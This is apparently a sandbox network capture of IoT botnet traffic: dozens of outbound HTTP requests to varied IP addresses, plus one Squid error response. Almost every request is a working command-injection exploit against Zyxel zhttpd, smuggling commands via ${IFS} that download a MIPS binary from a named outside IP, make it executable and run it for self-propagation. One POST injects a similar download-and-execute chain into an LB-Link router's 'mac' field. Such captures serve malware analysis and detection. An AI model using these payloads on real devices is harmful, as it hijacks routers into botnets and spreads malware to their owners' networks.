                                              Jan 29, 2024 07:04:00.219919920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7039192.168.2.1433910212.172.98.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.219970942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7040192.168.2.146045273.141.226.219443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.220015049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7041192.168.2.144439069.80.242.137443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.220051050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7042192.168.2.1460152129.97.113.224443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.220093012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7043192.168.2.1458002129.11.118.65443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.220140934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7044192.168.2.1441122213.65.163.234443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.220156908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7045192.168.2.146065658.28.246.249443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.220189095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7046192.168.2.1458214168.248.241.102443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.220246077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7047192.168.2.14352722.217.92.135443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.220293999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7048192.168.2.144130086.71.144.35443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.220330000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7049192.168.2.1437438184.183.159.38443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.220366001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7050192.168.2.143599239.72.166.127443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.220396996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7051192.168.2.1455276199.70.158.168443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.220443964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7052192.168.2.145988224.110.97.204443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.220479965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7053192.168.2.1435192181.14.219.56443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.220513105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7054192.168.2.144439234.88.185.66443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.220567942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7055192.168.2.1453408104.168.97.2208080
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.282063961 CET236OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                              Cookie: user=admin
                                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                              Jan 29, 2024 07:04:00.402271032 CET1286INHTTP/1.1 400 Bad Request
                                              Server: squid/3.5.20
                                              Mime-Version: 1.0
                                              Date: Mon, 29 Jan 2024 06:04:00 GMT
                                              Content-Type: text/html;charset=utf-8
                                              Content-Length: 3468
                                              X-Squid-Error: ERR_INVALID_URL 0
                                              Connection: close
                                              Data Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 2f 73 71 75 69 64 2d 69 6e 74 65 72 6e 61 6c 2d 73 74 61 74 69 63 2f 69 63 6f 6e 73 2f 53 4e 2e 70 6e 67 27 29 20
                                              Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2016 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('/squid-internal-static/icons/SN.png')


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7056192.168.2.143892296.184.93.219443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.229679108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7057192.168.2.145835254.71.133.132443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.229706049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7058192.168.2.145431438.114.4.214443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.229732037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7059192.168.2.1454622165.119.78.46443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.229779959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7060192.168.2.1451144207.238.164.85443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.229835987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7061192.168.2.1455078109.99.15.224443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.229882002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7062192.168.2.145314088.100.34.160443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.229919910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7063192.168.2.1445526179.104.100.219443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.229954958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7064192.168.2.1441002163.1.255.34443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.230005026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7065192.168.2.145307063.109.230.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.230041981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7066192.168.2.1433546122.30.147.170443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.230129957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7067192.168.2.145586281.15.101.103443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.230164051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7068192.168.2.144071857.52.24.148443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.230190992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7069192.168.2.144736653.22.250.244443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.230231047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7070192.168.2.1436836181.220.253.132443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.230264902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7071192.168.2.1457418183.248.36.150443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.230314970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7072192.168.2.143820080.97.183.157443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.230349064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7073192.168.2.1441684181.54.24.33443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.230401993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7074192.168.2.1433776222.8.96.70443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.230432034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7075192.168.2.1451876203.148.93.102443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.230463982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7076192.168.2.144731483.18.92.237443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.230529070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7077192.168.2.1446334100.190.22.10443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.230578899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7078192.168.2.1447912132.226.90.145443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.230602026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7079192.168.2.143865439.102.68.46443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.230628967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7080192.168.2.144938288.216.234.54443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.230690956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7081192.168.2.1459834172.157.116.183443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.230717897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7082192.168.2.1434276210.149.24.123443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.230755091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7083192.168.2.145296457.181.244.66443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.230797052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7084192.168.2.1445638111.18.112.15443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.230843067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7085192.168.2.14520904.246.142.137443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.230884075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7086192.168.2.1458462126.42.244.29443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.230931044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7087192.168.2.144241423.200.95.30443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.230969906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


